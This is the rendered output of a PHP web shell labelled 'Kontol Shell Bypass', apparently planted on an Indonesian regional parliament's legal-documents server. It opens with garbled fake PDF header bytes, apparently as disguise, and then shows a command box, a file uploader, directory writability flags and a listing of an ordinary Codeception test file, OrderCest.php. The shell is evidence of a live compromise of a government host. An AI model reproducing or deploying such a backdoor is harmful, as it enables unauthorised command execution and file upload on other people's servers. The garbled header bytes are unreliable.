%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/ildis_v4/vendor/codeception/base/tests/cli/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/ildis_v4/vendor/codeception/base/tests/cli/OrderCest.php
<?php

class OrderCest
{
    public function checkOneFile(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order LoadingOrderCept.php');
        $I->expect('global bootstrap, initialization, beforeSuite, before, bootstrap(B), test(T), after, afterSuite');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeFileContentsEqual("BIB([ST])");
    }

    public function checkForFails(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order FailedCept.php --no-exit');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->expect('global bootstrap, initialization, beforeSuite, before, bootstrap, test, fail, after, afterSuite');
        $I->seeFileContentsEqual("BIB([STF])");
    }

    public function checkForCanCantFails(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order CanCantFailCept.php --no-exit');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->expect(
            'global bootstrap, initialization, beforeSuite, before, bootstrap, test,'
            . ' fail, fail, test, after, afterSuite'
        );
        $I->seeFileContentsEqual("BIB([STFFT])");
    }

    public function checkForCanCantFailsInCest(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order CanCantFailCest.php --no-exit');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->expect(
            'global bootstrap, initialization, beforeSuite, before, bootstrap, test,'
            . ' fail, fail, test, test, fail, fail, test, after, afterSuite'
        );
        $I->seeFileContentsEqual("BIB([TFT][TFT])");
    }

    public function checkSimpleFiles(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order --no-exit --group simple');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeFileContentsEqual("BIBP({{{{[ST][STFFT][STF][ST]}}}})");
    }

    public function checkCestOrder(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run tests/order/ReorderCest.php --no-exit');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeFileContentsEqual("BIB([0123456])");
    }

    public function checkFailingCestOrder(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run tests/order/FailedCest.php --no-exit -vvv');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeFileContentsEqual("BIB([a%F])");
    }

    public function checkCodeceptionTest(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order CodeTest.php --no-exit');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->expect('
            global bootstrap,
            initialization,
            beforeSuite,
            beforeClass,
            @beforeClass,
            bootstrap,
            before,
            @before
            test,
            after,
            @after,
            afterSuite,
            afterClass,
            @afterClass');
        $I->seeFileContentsEqual("BIB({{[<C>]}})");
    }

    public function checkAfterBeforeClassInTests(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order BeforeAfterClassTest.php');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeInThisFile('BIB({[1][2]})');
    }

    public function checkAfterBeforeClassInTestWithDataProvider(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order BeforeAfterClassWithDataProviderTest.php');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeInThisFile('BIB({[A][B][C]})');
    }

    public function checkBootstrapIsLoadedBeforeTests(CliGuy $I)
    {
        $I->amInPath('tests/data/sandbox');
        $I->executeCommand('run order ParsedLoadedTest.php');
        $I->seeFileFound('order.txt', 'tests/_output');
        $I->seeInThisFile('BIBP(T)');
    }
}

Kontol Shell Bypass